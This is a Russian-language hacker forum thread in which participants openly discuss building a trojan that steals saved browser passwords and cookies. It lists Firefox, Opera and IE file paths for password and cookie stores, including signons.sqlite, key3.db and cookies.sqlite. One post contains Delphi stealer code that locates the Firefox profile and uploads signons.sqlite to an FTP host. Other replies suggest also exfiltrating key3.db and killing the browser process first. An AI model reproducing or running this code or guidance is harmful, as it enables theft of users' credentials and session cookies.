Откуда из Браузеров Трой тянет инфу о паролях и почте?? интрересуют Mozila и IE если можно название файликов и пути к ним пожалуйста
Если не в ломы напишите еще где лежат cookie в разных обозревателях. самому лень ) (з.ы в софари не нашел нихрена) с наступающим!!!
Mozilla Вроде как файле signons.sqlite -> сохр пароли (но не уверен)(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\signons.sqlite') Код который тырит сохр. пароли: Code: unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdFTP; type TForm1 = class(TForm) ListBox1: TListBox; Edit1: TEdit; IdFTP1: TIdFTP; procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} //На переменные которые лишние -> не обращаем внимания :) function GetUserFromWindows: string; var UserName : string; UserNameLen : Dword; begin UserNameLen := 255; SetLength(userName, UserNameLen); if GetUserName(PChar(UserName), UserNameLen) then Result := Copy(UserName,1,UserNameLen - 1) else Result := 'Unknown'; end; function GetSystemDisk: string; var S: array[0..MAX_PATH] of Char; begin GetWindowsDirectory(S,SizeOf(S)); Result:=copy(S,0,1); end; procedure TForm1.FormCreate(Sender: TObject); var User,Disc:string; coock,st,mask:string; f:TextFile; i:integer; Sf:tsearchrec; find:integer; Firefox:string; FireFoxUser:string; begin //code by wolmer Disc:=GetSystemDisk; User:=GetUserFromWindows; find:=FindFirst(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\*',faDirectory,sf); if find=0 then begin if ((Sf.Attr and faDirectory) = faDirectory) and ((Sf.Name = '.') or (Sf.Name = '..')) then begin Find:=FindNext(Sf); end; find:=FindNext(sf); FireFoxUser:=sf.name; end; Firefox:= Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\signons.sqlite'; if FileExists(Firefox) then begin IdFTP1.Username:='123'; IdFTP1.Password:='123'; IdFTP1.Host:='ftp.narod.ru'; IdFTP1.Port:=21; IdFTP1.Connect(); IdFTP1.Put(FireFox, 'NameFile1'); IdFTP1.Disconnect; end; end; end. Ну а куки мозила хранит в cookies.sqlite Вот для многих будет полезная информация о том какой файл и за что отвечает в мозиле: http://wiki.mozilla-russia.org/index.php/О%20профилях%20Mozilla%20Firefox
cпасибо !!только не могу найти где же эти cocie.sqlite ( там вот вычитал что есть такой cookies.txt а гдеон падлюка спрятан блиинн
Не ужели их тут нету? -> Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\' В основном в этом пути все хорошое/вкусное держится
ну спёр ты signons.sqlite, а дальше что с ним делать? написал бы чем расшифровывать и по-моему без key3.db ничего не сделаешь
Взял информацию из первого же источника в гугле, в крайнем случае ничего не мешает добавить еще одну строчку на залив файла key3.db (чем расшифровывать -> гуглите, в крайнем случае -> офф сайт мозилы)
читай код, приведённый wolmer'ом внимательнее там находится первая попавшаяся папка в \Profiles, имя которой отлично от . и .. можно для всех найденных папок реализовать, если их несколько
Для Mozilla: signons3.txt - файл паролей* *Если установлен мастер пароль то еще и key3.db пригодится P.S. В последних версиях firefox не позволяет просто так взять и украть сие файлы, нужно предварительно вырубать процесс
Все молчат что-то.. вот пути где лежат печеньки: Code: c:\Users\%USERNAME%\AppData\Roaming\Opera\Opera\cookies4.dat - Opera 10.10 win7 c:\Documents and Settings\%USERNAME%\Application Data\Opera\Opera\cookies4.dat - Opera 10.10 winXP c:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefox\Profiles\%хрензнаетчо%.default\cookies.sqlite - FireFox 3.5.6 win 7 c:\Documents and Settings\%USERNAME%\Application Data\Mozilla\Firefox\Profiles\%хрензнаетчо%.default\cookies.sqlite - FireFox 3.5.6 winXP c:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies\ - IE 8 win7 c:\Documents and Settings\%USERNAME%\Cookies\*.* - IE 8 winXP
